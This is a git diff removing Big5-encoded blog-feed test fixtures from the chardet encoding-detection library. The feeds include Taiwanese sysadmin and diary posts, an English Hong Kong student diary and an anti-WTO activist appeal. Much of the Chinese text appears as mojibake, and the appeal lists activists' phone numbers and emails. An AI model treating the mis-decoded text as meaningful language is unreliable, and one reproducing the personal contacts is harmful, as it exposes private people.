-¨ֳ¥B«e₪@₪ׁ±₪W₪~¦V¦ׁ®v¥‎¹w÷t₪f¸ױ³ר§i₪÷®e -₪@₪ֱ¹Lµ{³£«ֵוְI×÷₪~§¹¦¨¾ד­׃½׳₪ו₪f¸ױ³ר§i -·ם₪ׁ₪f¸ױµ²§פ¦ׁ®vµoµ®נ¡A₪j₪j×÷©ְ₪F§₪@¹y -ֱצµM₪f®נֱ¬O«¥­½w¡A¦‎§×¾¹D¦ׁ®v¯u×÷«¥ֽ®נ -₪f¸ױ¯א¹Lֳצ¯u×÷¬O¦ׁ®vֵ@¯ט¡A·Pֱֲ¦ׁ®v±׀¾ֹ -§·|¦n¦nְֻ°Q­׳¥¿¦₪v×÷¿ש»~¡A§ן¶i¯ֲI - http://tw.blog.xubg.com/wp-commentsrss2.php?p=60 - - - ²£¥ֽLDAP×÷Logְֹ - http://tw.blog.xubg.com/index.php?p=59 - http://tw.blog.xubg.com/index.php?p=59#comments - Sat, 21 May 2005 07:51:43 +0000 - - ¨t²־÷²z₪ו¥ף http://tw.blog.xubg.com/index.php?p=59 - LDAP¬O­׃¥״¿‎×A°ָ¡A¥‏¦W¬OLDAP(Lightweight Directory Access Protocol)»´¶q¯ֵ¥״¿‎¦s¨ת¨ף©w -³o¬O­׃±j₪j×÷±b¸¹¾ד¦X¾ק¨מ¡A«D±`¦n¥־ -¦‎₪£₪׃¦n·d©w¡A³ּ¦n¬O¬®ׁ¨׃¾ַ² -³]©w×÷µ²×G₪£÷¦p¦ף¡A₪@©w¨t²־­n²£¥ֽlogְֹ -₪£µM¥X²{¿ש»~¡A₪]₪£×¾¹D¿ש¦b¨÷¸ּ¡A³s­n§ן´N₪£×¾±q¦ף₪U₪ג -³]©wlogְֹ₪ט×k¦³₪T­׃­n×`·N¡G -1¡B½s¿ט/etc/syslog.conf¡A¥[₪J₪@¦זlocal4.* /var/log/slapd.log -2¡B¦A«״¥slapd.logְֹ¡A«¥O'touch /var/log/slapd.log' -3¡B½s¿ט/etc/newsyslog.conf¡A¥[₪J₪@¦ז '/var/log/slapd.log 640 7 * @T00 J' ¡Aֵ‎¥¦¯א¨C₪ׁ²£¥ֽlogְֹ - http://tw.blog.xubg.com/wp-commentsrss2.php?p=59 - - - ´M§ה«¥O-find - http://tw.blog.xubg.com/index.php?p=58 - http://tw.blog.xubg.com/index.php?p=58#comments - Sun, 15 May 2005 19:53:52 +0000 - - ¨t²־÷²z₪ו¥ף http://tw.blog.xubg.com/index.php?p=58 - ³o¬O«D±`¦n¥־×÷₪@­׃«¥O¡A¥i¥H´M§הְֹ®׳©־¥״¿‎³£¥i¥H -¥­®ֹ¨ֿ¥־®ֹ±`·f°t(¡¯)¸U¥־¦r -Linux¡G -find / -name auth* -FreeBSD¡G -find / -name auth\\* -¨ג­׃°ׁ¼ֶµy·L₪£¦P - http://tw.blog.xubg.com/wp-commentsrss2.php?p=58 - - - ²ִ₪G¶¥¬q¼f¬d¨S³q¹L¡A¸¨¿ן₪F - http://tw.blog.xubg.com/index.php?p=57 - http://tw.blog.xubg.com/index.php?p=57#comments - Wed, 11 May 2005 07:15:47 +0000 - - ₪±¡ְH₪ג°O - °]°ָ°O¨ֶ¥» http://tw.blog.xubg.com/index.php?p=57 - ³o¦¸°ׁ¥[¾ַ®ױ×÷¦¸U¿v¹­pµe¡A¨S¦³³q¹L¸¨¿ן₪F -ֲk¯ַ­ל¦]¦³¨ג₪jֳ‏¡G -²ִ₪@­׃¦₪v·ַ³ֶ₪£°ק¡A¦b¹Lµ{₪₪¨S¦³¦n¦n×÷²M·¡¥ז«»¡©ת¾ד­׃×÷¥״×÷₪־°ץ¦ז₪ט×k¡C -²ִ₪G­׃÷A«׳₪׃»´©¿¡A¥H¬°¦₪v¥״¼׀¬O₪½¯q₪£¬O¬°­׃₪H¡A´N¥H¬°µ¼f·|µ¹¦n×÷µ»ש¡C -¨S·Q¨ל³o¥»¨׃´N¬O¥H­׃₪H¬°¥D×÷¿v¹­pµe¨S¦³©ׂ¿׳×÷¬°₪½¯q´N¸¦Y­»¡C©ׂ¥H¦b¼f¬d₪W¨ֳ₪£·|¥t²´¬¬¡A³o¹ך¦b¬O¦₪v»´©¿×÷¦a₪ט¡C -»­n¦Aְֻ°Q¥¢±ׁ­ל¦]¡A¦₪vֱ­n«ה¦ׂ¦p¦ף§ן¶i -¥¢±ׁ¹ן§­׃₪H¨׃»¡¨S¦³₪°»עֳצ«Y¡A¥u¬O¶d­t₪F§O₪H¹ן§×÷´ֱ±ז -ֱ¦³¥¢¥h₪Fֵ‎³o­׃₪½¯q­pµe¡A¹ן¥~ֳn¥ת×÷µ´¨־×÷¦n¾ק·| -¦₪v¯u×÷¬O­n¦n¦nְֻ°Q¦Aְֻ°Q¡C -¨ֶ¹ך₪W­n§¹¦¨³o­׃­pµe¡A¥»¨׃´N¬O₪@¥ף«§xֳר×÷¨ֶ¡A§O₪H½ט¸§A×÷¯א₪Oֳh÷ֳ§A×÷°¾ק³£¬O¥i¯א×÷ -­n¦p¦ף¨׃»¡×A§O₪H¨׃¬«H§A×÷°µ³o¥ף¨ֶ¯u×÷¬O¬°₪½¯q¡A₪]¯א½T¹ך§¹¦¨¡H -¦b³o¥ף¨ֶ₪W§¯u×÷¥¢±ׁ₪F¡A§₪ׁ¯u×÷¥H¬°¬O₪½¯q­pµe¡Aµ¼f₪]·|»{¦P₪~¬O -¨ֶ¹ך₪W°××¾ֳׁ¥ק₪l×÷¥L­ּ¬O«ֳר·Q¹³¨ל¡A³o¬O¥²­n¥²¶·×÷ -¦]¬°¥L­ּ¥i¯א₪@½ת₪l³£¨S¦³¯¹L¿ת¡A§¹¥‏ֵי·|₪£¨ל¡C -₪]¨S¨£¹L¯u¹ך×÷¥i¼¦×÷¨ׂ₪l¡A«ֳר¥s¥L­ּ¬«H¦b³o×ְ·|₪W½T¹ך¦³³o÷״»­nְ°§U×÷₪H¡A¦׃³o¼ֻ×÷₪Hֱ₪£₪ײ -§©ׂ°µ×÷­pµe¥¦½T¹ך¬O¯אְ°₪@¨ַ₪ֹ₪ז₪p¥ֱ´ח¹Lֳרֳצ×÷ -§ֱ¨S₪W¥x³ר§i₪§«e¡A³£¦b¦ׂ¼{¬O₪£¬O­n¨«´d±¡­·®ז¨׃¬נֵד¯S¦ג -¦׃³ּ«ב©ס±ף¥־³o÷״´d±¡¦¡¡Aִ±±oְ³¸׃¬O¥H±M·~ֳׂ©ת§­ּ×÷team×÷¯א₪O -¥H¬°¦p×G¦³¥J²׃¬´£¨ׁ×÷®ׁ­±¸ך®ֶ´N×¾¹Dteam×÷§V₪O₪־§@×k¡A¬O¥i¦ז×÷¡A¦׃°w¹ן¥¼¨׃×÷₪£½T©w¦]¯ְ₪£´±»¡¬O₪v¦³§¹¾ד×÷°t®M±¹¬I¡A¦]¬°×ק¿ִ²£«~ֵ₪ֶ₪׃₪j¡C¦‎§­ּ¬O­׃team·|₪@°_¨׃·Q¿ל×k¸ׁ¨M¡Aµ´¹ן¥i¥Hֱ׳§K¦]₪@­׃₪H×÷¦]¯ְ¨«₪J¦÷­J¦P¦׃₪£¦ִ±¡C -¦‎¨ֶ¹ך₪W§¿ש₪F¡Aµ¼fֱ¬O·|¦Y³o₪@®M¡C -­ת´N¹ן₪F¡A₪£÷«ח¼ֻ¦₪ײ·|¥[₪ְֳׂ©ת¦₪v×÷°ם«ש -¹ן₪£°_₪j®a¡A¹ן₪£°_team¦¨­¹ן§×÷´ֱ±ז -¦]¬°§»´©¿¡Aֵ‎₪½¯q­pµe¥¢¥h₪F₪@­׃µ´¨־¥i¥H¼W¥[×¾¦W«׳×÷¾ק·| -¹ן₪£°_₪µ₪ׁ¯S§Oֶ{´e¡A¥­®ֹ₪]±`¬°₪Fproject₪]¸I₪£₪ײ°v₪l -³£¯א¥H¥­±`₪¬¨ל«¥¦¡A«©_©ַ₪µ₪ׁ¯S§O·׀₪¡Aְ³¸׃¬O§¹ן¥¦¦³©ׂ´ֱ±ז§a - http://tw.blog.xubg.com/wp-commentsrss2.php?p=57 - - - project₪v³q¹L²ִ₪@¶¥¬q¼f¬d - http://tw.blog.xubg.com/index.php?p=56 - http://tw.blog.xubg.com/index.php?p=56#comments - Wed, 04 May 2005 10:40:09 +0000 - - °]°ָ°O¨ֶ¥» http://tw.blog.xubg.com/index.php?p=56 - ₪½¯q­pµe¡A³q¹L×ל¿ן₪F -₪₪₪¯u×÷«°×¿³¡A¥u­nµ¹§³ר§i×÷¾ק·| -¬«H§´N·|±o¨ל₪ה´©¡A¦]¬°­pµe¬O¬°₪F₪½¯q¡B¬°₪F₪j²³¡A₪£¬O¬°₪F§¦₪v -·םµM§ֱ­n¦₪v¥‎¹w÷t¦p¦ף³ר§i¡A­n¥‎÷t½m¹L -₪£­n¨ל®ֹ­װ­±¹ן¼f¬d©e­¡A₪ג¦£¸}¶ֳ´N₪£¦n₪F -¥­®ֹ§ה¸ך·½¨ף§U¡A´N±`±`¸I°v₪l -¦n₪£®e©צ¦³³o­׃¾ק·|¡A·םµM­n¦n¦n×§¨ת -¥D­n¦p×G¦¨¥\\·|¦³₪G₪Q¸U×÷¸g¶O¥i¥H¨ֿ¥־¡A³oµ§¿תֱצµM₪£¦h¦‎₪£µL₪p¸ֹ -ֱ¦³₪@­׃§ף­«­n×÷¡A´N¬O¥i¥H³z¹L¾ַ®ױ¥l¶}×÷°O×ּ·|¨׃¼W¥[₪½¯q÷פ¯¸×÷×¾¦W«׳¯א°קְ°§ף¦h×÷¦³»­n×÷₪H - http://tw.blog.xubg.com/wp-commentsrss2.php?p=56 - - - ­«·s¸₪JDNS - http://tw.blog.xubg.com/index.php?p=55 - http://tw.blog.xubg.com/index.php?p=55#comments - Wed, 04 May 2005 09:05:15 +0000 - - ¨t²־÷²z₪ו¥ף http://tw.blog.xubg.com/index.php?p=55 - ­ל¥»¬[÷c¬O³ז₪@¥D¾ק¨׃÷²zDomain -²{¦b¦h₪F₪@¥x¥D¾ק¨׃share¡A₪]´מ₪ײ­ל¥»¥D¾ק­t¾ב -§גFreeBSD×÷¥D¾ק¥[₪J¨׃¡A­ל¨׃×÷¥D¾ק¦h¥[₪F±i÷פ¸פ¥d -ֵ¦¨₪G­׃÷פ°ל°µ°ֿ¹j¡A₪@­׃¹ן¥~₪@­׃¹ן₪÷ -÷²z°_¨׃₪]₪ס¸ֲ²³ז¡A­«·s¦A³]©wDNS -±NDomain«¦VFreeBSD - http://tw.blog.xubg.com/wp-commentsrss2.php?p=55 - - - ×B₪ֽ×÷ֳצֳh - http://tw.blog.xubg.com/index.php?p=54 - http://tw.blog.xubg.com/index.php?p=54#comments - Wed, 04 May 2005 05:39:59 +0000 - - ₪±¡ְH₪ג°O http://tw.blog.xubg.com/index.php?p=54 - ¦n₪[₪£¨£×÷×B₪ֽ³ּ×ס­ט¦n¦^°×¶¯ -¶X³o­׃¾ק·|¥L¬ש₪F§­ּ´X­׃×B₪ֽ¥h¦Y½¼₪l -·Pִ±¯u×÷₪£¿ש¡A¦n₪[¨S¦³¥X¥h¸ע×B₪ֽ²ב₪ׁ»E·| -¬P´ֱ₪­±₪W₪QֲI¦h¡A¥|­׃₪H₪@°_¥h¦Y¦Y³³ -½ֽ¨ל­׃¦×÷µo®i³£₪£¿ש¡A¥u¦³§ֱ¨S₪°»ע¦¨´N -×B₪ֽ­ּ₪]·|ְ°§·Q·Q¿ל×k¡A¬¯א₪£¯אְ°×÷₪W§₪°»ע¦£¡A¯u×÷«·Pֱֲ -³o¨ַ×B₪ֽ¬O¦b§°h¥מ«ב¡A¥h¾נ¼w₪W¸ך®ֶ®w³]­p¯Z©ׂ»{ֳׁ×÷¡A¬O¦P₪@²ױ×÷²ױ­ -¥L­ּ²{¦bµo®i³£«´־¡A§²{¦bֱ­n¦A§V₪O»°§ײ±N½׳₪ו¼g¦n¥H₪־­pµe¶¶§Q±ְ° -¶¶§Q²¦·~¨ה¥L×÷¦A»¡¡A¥H¬ד¨s©ׂ²¦·~¬°¥‎ - http://tw.blog.xubg.com/wp-commentsrss2.php?p=54 - - - diff --git a/chardet/tests/Big5/unoriginalblog.com.xml b/chardet/tests/Big5/unoriginalblog.com.xml deleted file mode 100644 index 07f9ff8..0000000 --- a/chardet/tests/Big5/unoriginalblog.com.xml +++ /dev/null @@ -1,229 +0,0 @@ - - - - - - - a kenneth kam blog - http://unoriginalblog.com - Unoriginality redefined - a kenneth kam blog. - Thu, 22 Dec 2005 15:22:05 +0000 - http://wordpress.org/?v=1.5 - en - - - Aiya… - http://unoriginalblog.com/2005/12/aiya/ - http://unoriginalblog.com/2005/12/aiya/#comments - Thu, 22 Dec 2005 16:08:16 +0000 - Ken - - Diary - Hong Kong - http://unoriginalblog.com/2005/12/aiya/ - - ¸ױ₪U₪µ₪י¥־₪₪₪ו¥´₪י°O¥‎¡K ¥´±o®t­ר¦n©ַ§! ­רֳׁ»o­׃d´N¡K hahaha ְ°§A¦a­ר¨ל~ ¾ַ₪U₪₪₪ו°ױ.

    -

    ©O´X₪י³£´X¶}₪°ױ~ ¨£¨ל¯Zbristol₪ֽ~ ¦n¦¦n­@ֹN¨£ֻbo~ haha¡K ­¹¥×lunch°ױ¡K ¦³₪H½ז¥×telephone, ¸ע¦ם¦³¨ג­׃₪H¶R¥×telephone¡K ₪£¹L¦₪v´NֹN¥X°ױ¡K ¦n·Q¥Xw900i§r~ ¦n«¬§r~ ֵ¨®ֽ§§r~~~ ¦P®I₪SֹN«§¶R§ֻ¡K.ֵ¥₪י«Y®ֹ«J­n¥h₪J³f°ױ~ wakeke.

    -

    ₪µ₪י½נ¥×°}×i¡K ¿נ¥×30mins¡K ¦n­@ֹN¨£°ױwo terence!!!~ ₪£¹L₪@¥X¾₪½נ´N₪ס₪Hfoul¡K ­~ ₪Sinjured¥×¡K ₪ס\§jµָ~ ₪ײ·₪µ₪י­ר«Y¦n·Q¥־₪O¡K§A¦a¦n±m¡K haha~ ³ּ§ְ¾ֶ¥×6-2~~ yeah yeah~ ¸ע¦םterence´N³­¥×§¥h¶R₪ײ₪ײ³¥~~~ ֻ¼ֻ´N×נ«־¥ר­¹³¥¡K

    -

    ­~ ¼g₪₪₪ו¦n·׀§r~ ­ר¼g°ױ~ bye bye~ -

    -]]>
    - http://unoriginalblog.com/2005/12/aiya/feed/ -
    - - Dental Appointment, International Driving Licence - http://unoriginalblog.com/2005/12/dental-appointment-international-driving-licence/ - http://unoriginalblog.com/2005/12/dental-appointment-international-driving-licence/#comments - Tue, 20 Dec 2005 10:52:36 +0000 - Ken - - Diary - Hong Kong - http://unoriginalblog.com/2005/12/dental-appointment-international-driving-licence/ - - Couldn’t sleep in today since they were having renovations upstairs at 9am and I got out of bed at 10pm. Decided to go to ¶¼¯ש with my dad, so we drove to Tsuen Wan. I had a near fatal accident. After that we drove to ssp, and I had another near fatal accident in which I didn’t stop in time and nearly crashed into the car in front. The car behind narrowly missed me as well.

    -

    I then had my annual dental check up.

    -

    Then I applied for an International Driving Licence… ironic… -

    -]]>
    - http://unoriginalblog.com/2005/12/dental-appointment-international-driving-licence/feed/ -
    - - New hair cut - http://unoriginalblog.com/2005/12/new-hair-cut/ - http://unoriginalblog.com/2005/12/new-hair-cut/#comments - Mon, 19 Dec 2005 14:21:50 +0000 - Ken - - Diary - Pictures - Hong Kong - http://unoriginalblog.com/2005/12/new-hair-cut/ - - Saw Kitty today in TST… so funny, she told me to go to this place… first exit out of C1, then walk straight, then turn… (she didn’t say left or right), then go straight, then the tunnel, actually don’t go into the tunnel, actually… well, go right, no left… @@ haha.

    -

    Anyway I got there finally, she came to the exit to find me thx goodness~~ haaaa.

    -

    New Hair -

    -]]>
    - http://unoriginalblog.com/2005/12/new-hair-cut/feed/ -
    - - End of … - http://unoriginalblog.com/2005/12/end-of/ - http://unoriginalblog.com/2005/12/end-of/#comments - Tue, 13 Dec 2005 11:43:51 +0000 - Ken - - Diary - Uni - http://unoriginalblog.com/2005/12/end-of/ - - The end of term is approaching fast and I don’t know whether to be happy or not. It just doesn’t feel like the end yet. Perhaps for the whole semester I’ve been joking around, not doing any work whatsoever… Anyway, I am glad that I will be going back to Hong Kong soon, and hopefully I can still find most of my Bristol peeps when they go back as well.

    -

    Many things happened this term, some of which left an amazing memory while some I hoped they never happened. But, having said that, I’ve learnt a lot more than I did before. The way I am meant to think, the way I am meant to act… I sacrificed a lot for this I guess, and it could have been won in a better and less harmful way… but I am still glad that I learnt something from it. Better gaining something by losing something than not gaining anything at all, right? There are a few people that I really want to thank but… I don’t really want to do it on the blog… it’s already corny enough.

    -

    I don’t know how to write this, but I’d like to apologize to anyone I’ve hurt over this sem. Yeah, you could say I am thinking too much again, but this is exactly what I feel right now, and I know who I’ve hurt, and they probably know who they are. This isn’t a plead to be forgiven, but genuinely an apology. By doing some really really thoughtless things, I hope I’ve learnt something, and I won’t end up doing the same thing and hurting more people.

    -

    All in all though, I can’t really express how much I love Bristol, no matter how hard the times were during this sem. There were always support from all of you… even Roland :D . I just hope that this can continue forever and forever. Unfortunately, I know it won’t. I think I have around 3 years time to really enjoy myself… and I want to make the most of this… and I hope all my friends can too… Without you guys, and girls, Bristol wouldn’t be the same. Cheers~ :D

    -

    It might be the end of term… but it’s definately a start for something else~ -

    -]]>
    - http://unoriginalblog.com/2005/12/end-of/feed/ -
    - - Wind Tunnel - http://unoriginalblog.com/2005/12/wind-tunnel/ - http://unoriginalblog.com/2005/12/wind-tunnel/#comments - Fri, 09 Dec 2005 13:01:05 +0000 - Ken - - Diary - Pictures - Uni - http://unoriginalblog.com/2005/12/wind-tunnel/ - - Wind Tunnel

    -

    Lab work in wind tunnel. Fun stuff…………….

    -

    I nearly had an argument with my lab mate because he was being such an ass. -

    -]]>
    - http://unoriginalblog.com/2005/12/wind-tunnel/feed/ -
    - - Maths with Maple - http://unoriginalblog.com/2005/12/maths-with-maple/ - http://unoriginalblog.com/2005/12/maths-with-maple/#comments - Thu, 08 Dec 2005 12:18:36 +0000 - Ken - - Diary - Pictures - Uni - http://unoriginalblog.com/2005/12/maths-with-maple/ - - Maths with Maple -

    -]]>
    - http://unoriginalblog.com/2005/12/maths-with-maple/feed/ -
    - - Tired… - http://unoriginalblog.com/2005/12/tired/ - http://unoriginalblog.com/2005/12/tired/#comments - Tue, 06 Dec 2005 11:52:20 +0000 - Ken - - Diary - Uni - http://unoriginalblog.com/2005/12/tired/ - - Finally I can be bothered to update my blog… it’s been a while and lots of things have happened… but none of them were bad… yes sorry to have disappointed any of you who wanted to read about the screams and embarassments I’ve made recently. Well, you can’t say there weren’t any embarassments but none of them would leave you laughing… in fact I don’t think any of them were funny…

    -

    Lots of tests have gone by. Just had an aircraft systems test… it’s like learning aircraft history… interesting but I hate history. Never liked it. Never will. Don’t think I did that well on the test… I have another one this afternoon but that’s going to be even harder… Fluids test… what the hell. I haven’t done anything for it.

    -

    One thing I am pissed off is how lazy I’ve gotten over last year. The gap year screwed me over and a half… Oh well… -

    -]]>
    - http://unoriginalblog.com/2005/12/tired/feed/ -
    - - I am back! - http://unoriginalblog.com/2005/11/i-am-back/ - http://unoriginalblog.com/2005/11/i-am-back/#comments - Sat, 26 Nov 2005 14:09:28 +0000 - Ken - - Diary - Uni - http://unoriginalblog.com/2005/11/i-am-back/ - - I am back from injury!! I played football today but nearly injured myself again… hahaha -

    -]]>
    - http://unoriginalblog.com/2005/11/i-am-back/feed/ -
    - - Waiting - http://unoriginalblog.com/2005/11/waiting/ - http://unoriginalblog.com/2005/11/waiting/#comments - Thu, 24 Nov 2005 13:58:16 +0000 - Ken - - Diary - Uni - http://unoriginalblog.com/2005/11/waiting/ - - Haven’t done much these days apart from waiting to go back to Hong Kong. I played loads of Gundam Seed recently at Unite House… kicking Lionel’s ass hahahaha. Then having to do reports after reports after revision after reports… well it felt that way anyway. I only got 17/27 in my Electronics test… what the hell… And tonight I was going to watch a film but instead I am going to have to do Maple… what the hell…

    -

    But then the good thing is my ankle is getting better and better and better… I think I can play football next week, wahahaha. So happy. Haven’t played for ages. I hope our team wins the Bristol Games on the 8th of December… although it’ll be freezing cold I’ll still be playing………………

    -

    Already 1pm… time for lunch… then time for Buckling labs… = more reports…

    -

    Lucky that the afternoon drawing session tomorrow afternoon is off. -

    -]]>
    - http://unoriginalblog.com/2005/11/waiting/feed/ -
    - - Another day - http://unoriginalblog.com/2005/11/another-day/ - http://unoriginalblog.com/2005/11/another-day/#comments - Tue, 22 Nov 2005 01:55:21 +0000 - Ken - - Diary - Uni - http://unoriginalblog.com/2005/11/another-day/ - - So much work… so little time. Test tomorrow… damn…
    -What did I do today???

    -

    1) Electronics Labs
    -2) Programming…. son of a bitch
    -3) Electronics revision
    -4) GTA San Andreas

    -

    Spot the difference. -

    -]]>
    - http://unoriginalblog.com/2005/11/another-day/feed/ -
    -
    -
    diff --git a/chardet/tests/Big5/upsaid.com.xml b/chardet/tests/Big5/upsaid.com.xml deleted file mode 100644 index 1ed89b8..0000000 --- a/chardet/tests/Big5/upsaid.com.xml +++ /dev/null @@ -1,188 +0,0 @@ - - - - - isis - http://www.upsaid.com/isis/ - - zh-tw - 2005-12-31T03:13:13+07:00 - isis - - - - - - - - - - - - - - - - - - - - - - - - - - ¡C₪ֿWTO¡D₪H¥ֱ¦³§¼ֵֹv¡I₪½¥ֱֱn´©₪ֿ¥@¶T³s¸p¦ז° - ¡i²{³ץֱp¸p¡j <br /> <br />µo°_₪ט¦¡¡G2005¦~12₪כ21(₪T)₪W₪ָ10ֲI~₪U₪ָ6ֲI <br /> 12₪כ22(¥|)¡B23(₪­)₪U₪ָ4ֲI~±₪W10ֲI <br /> ·s¥ת₪T¶V(¯¸«e©±) ₪ֿ¥@¶T³s¸p×־¨m½c¡Bֵw×ן¥[₪J¡I <br />µo°_₪½¥ֱ¡G¿א­»§D¡]0935-452-410¡^´¿¾ו¬ֲ ¡]0952-490-149¡^₪¦­¦ (0928-207-211) <br /> <br />¹q₪l¶l¥ף¡Ga8735044@stmail.fju.edu.tw <br /> <br /> <br /> <br />¡i÷פ¸פֱp¸p¡j¦³¨ג÷״₪ט¦¡¡G <br /> <br />§A¥i¥H¨ל<a href="http://www.nobnog.org.tw/modules/newbb/viewtopic.php?topic_id=61&forum=1&post_id=272#forumpost272" target="_blank">¦¹½u₪W³s¸p</a> <br /> <br /> <br />©־¬O×½±µֱp¸p¶ַ¦^ <a href="mailto:777@nobnog.org.tw">777@nobnog.org.tw</a> ©־ <a href="mailto:a8735044@stmail.fju.edu.tw">a8735044@stmail.fju.edu.tw</a> <br /> <br />©m¦W¡G______________ ³ז¦ל¡G________________ ֲ¾÷¡G__________ <br /> <br /> [more...]<ul> <br /><li>¦׳¨­»P´ׂ´־¡G₪ֿWTO₪H₪h»PWTO½ײ₪~¬O¼ֹ₪O¡H <br /> <br />¥»₪כ17₪י±¶¡¦18₪י­ג±ב¡A₪E¦¦h¦W«e©¹­»´ה¶i¦ז₪ֿWTO×÷ֱת°ך¹A¥ֱ¡B×ְ¹B₪H₪h¡B¥xֶW₪u¹B¹־ֵי₪־¾ַ¥ֽ¡A¦b₪גµL₪oֵK¡B¥u¾a¦ו¦׳₪§ֲ¶i¦ז₪ֿWTO¶D¨D×÷׬÷A₪U¡A³÷¾D¨ג₪d¦W­»´ה×Z¸ִֻµ¹מ¥H₪פ¬W¡B­J´װ¼Qֳת¡B¶²\¥ֻ´µ¡B´ׂ´־¡B¬µPµ¥×Z¾¹¶i¦זWTO₪ֿ§¥v₪W³ּ₪j³W¼ׂ×÷¡u×Z¸ֻ¶e®·¦ז°¡v¡C <br /> <br />19₪י¡A³z¹L¾ת§Tֲk¨׃×÷×ְ¹B₪H₪h®C«|ִִ­z¡A¦u¦b¹qµר«e×÷¥xֶW₪½¥ֱ₪ט₪~±o×¾¡A­»´ה¬F©²¬O¥H«ח¼ֻ¡u₪£₪H¹D¡v×÷₪ט¦¡¹ן«³o¸s¡u₪ֿWTO₪H₪h¡v¡Gִµ´ׂ¼¥´₪U×÷²J¶ֻ¡BְY³¡×÷³׀¶ֻ₪־©כ¸T´ֱ¶¡₪£µ¹¶¼₪פ­¹×«¡B±j¨מ²ז°£¿m´H¦ח׫¡B­­¨מ¹ן¥~ֱpµ¸¡B´Nֲו»±a₪ג¾R¡B¦p´Z»ִµ¹מ¬¦uµ¥¡uֲֶµר₪Hֵv¡v§@¬°¡C³ּ«ב¡A­»´ה¬F©²§ף¥H¼ׂ½k×÷¡u¯A¶°ׁ»P«D×k¶°·|¡v°_¶D¥]¬A¥x₪j¾ַ¥ֽ§ץ«״¸¦b₪÷₪Q¥|¦W¦U°ך₪ֿWTO₪H₪h¡A¸ױ¹ֿ¥H¡y×k«¡z₪־¡y÷÷»¡z³o¨ג¶µ§ף₪j×÷¼ֹ₪O¹ן¥״«e₪־¥¼¨׃×÷¡y₪ֿWTO¹B°¡z¶i¦ז¹ך½ט«ְֲ~¡C <br /> <br />¦b¦¹¡A¨­¬°¥xֶW₪־°ך»₪½¥ֱ×÷§­ְּ³¸׃­n°×÷¬O¡A₪E¦¦W¥־¦׳¨­¶i¦ז§×§¶D¨D×÷¥«ֲ₪H₪h¡A»P¨ג₪d¦W¨ֿ¥־´ׂ´־₪־¶²\¥ֻ´µ×÷×Z¸ֻ´הִµ¡A³o¼ֻ₪£¹ןµ¥×÷×Z₪O¡A¨ל©³½ײ₪~¬O¼ֹ₪O¡H <br /> <br />µL½׳¬Oֱp¦X°ך¾ֻ³¹©־¬O¥@¬ֹ¦U°ך¾ֻ×k¡A¬°¨D¥ֱ¥Dµo®i¡A§¡©ת₪ו«O»₪H¥ֱ¶°·|₪־¨¥½׳¦¥ׁ¡C°ך®a¬°₪F«O»₪H¥ֱ¶°·|¦¥ׁ¡A§ףְ³´£¨ׁ¶°·|³ץ©ׂ₪־«O»¶°·|´ֱ¶¡₪§¦w¥‏¡C­±¹ןWTO³o¼ֻ¹ן½a°ך₪p°ך²@µL§U¯q¡A§ף×ס©ף¸gְ­¢®`×÷¡y×§ִ³©°ֳD¡z¡A´ה©²³÷µM§¹¥‏©¿²₪¨׃¦®z¶ױ°ך®a×÷©Iֱn¡A¦׃¥ּ©ף¦¨¬°WTO×÷¥´₪ג¡I <br /> <br />¨­¬°¥xֶW₪־°ך»₪½¥ֱ¡A§­ּ»{¬°ְ³¸׃¹ן­»´ה¬F©²₪£₪H¹D¡Bֲֶµר₪Hֵv×÷¡y¼ֹ₪O¦ז¬°¡z₪©¥Hִ‏³d¡A¨ֳ¥H¨דֵי×÷³s¸p¦ז°¡Aֱn´©¥״«e₪´«שִע¦b­»´ה¶i¦ז₪ֿWTO×÷¦P§׃¡A₪־¾D¨ל´ה©²°_¶D¨ֳ÷¸T×÷¥x₪j¦P¾ַ¡C¦P®ֹ¡A§ףְ³¸׃¨דֵי»{×¾¡AWTO­I«בֳe₪j×÷¬F×v¸gְ§Q¯q₪ְֵB¡A₪~¬O¾ֹ­P±j°ך­n¥H¦p¦¹¡u¼ֹ₪O₪ג¬q¡vֲםְ£₪ֿWTO₪H₪h×÷°₪@¦]¯ְ¡C <br /> <br /><li>°²¦ּ°s»P¬µ¼u«ָ¡GWTO­Y¦³¯q¡A½ײ₪ֿWTO¡H <br /> <br />2003¦~9₪כ10₪י¡A¥@¬ֹ¶T©צ²ױֲ´²ִ₪­©¡³¡×ר·|ִ³¡u§¢©ר¦^¦X¡v¡C·|³ץ¥~₪@¦לֱת°ך¹A¥ֱ«ש₪M¨כ₪J¦₪v¯₪f¡A¥־¦₪v×÷¥ֽ©R¨׃§ִ³WTO¹ן©ף₪p°ך₪p¹A¸gְ₪־¥ֽ­p₪W×÷­¢®`¡C¾ֱת°ך¹A¥ֱ×ם¥¡A¦±qֱת°ך¥[₪JWTO₪§«ב¡A¨C¦~§¡¶ַ¹A¥ֱ³¹Aֳִ¦±‏¨ֶ¥ף¡A¨¬¨£WTO¹ן®z¶ױ¹A¥ֱ×÷¹ך½ט¶ֻ®`¡C₪ֶֿ[¥xֶW¡A¦±q2001¦~¥xֶW¥[₪J¥@¶T²ױֲ´¡A₪]¾ֹ­P₪@³s¦ך¦M₪־₪H¥ֱ¥ֽ©Rֵv¡B°·±dֵv¡B₪u§@ֵv₪־¥ֽ¦sֵv×÷¨ֶ¥ף¡Gµׂ°s₪½½ז¨מ«׳¨ת®ר¾ֹ­P¦ּ°s»ש®זצt°×¡B°²¦ּ°s­P₪H©ף¦÷¡F¶}©ס°ך¥~¹A²£«~¶i₪f¡B©ס±ף¹ן¥»°ך¹A·~¸ֹ¶K»²§U¡A¾ֹ­P¥»₪g¹A¥ֱµL¥H¬°¥ֽ¡B¦׃¥xֶW₪½¥ֱ«h³´₪J¡u°ע¦]¦¾¬V­¹×«¡]¬°ך¡^¡v₪־¡u¶ֲ₪²¦Hֲ³­¹¡]₪j³°¡^¡v×÷§¨±‏₪§₪₪¡A´ֱ¶¡§ף₪°_¹A®a₪l§ּ·¨¾§×ש¥H¡y½_¦ּ¬µ¼u¡z¶i¦ז§¼ֹ×÷¨ֶ¥ף¡C¥@¬ֹ¶T©צ¦¥ׁ₪ֶ¬O¸gְ±j°ך¹ן½a°ך₪p°ך×÷«I²₪₪ג¬q¡A¹ן½a°ך¸gְ²@µL§U¯q¡A§ף¬O°ך»©³h´I®t¶ZֲX₪j×÷ְ°¥¡C <br /> <br /> <br 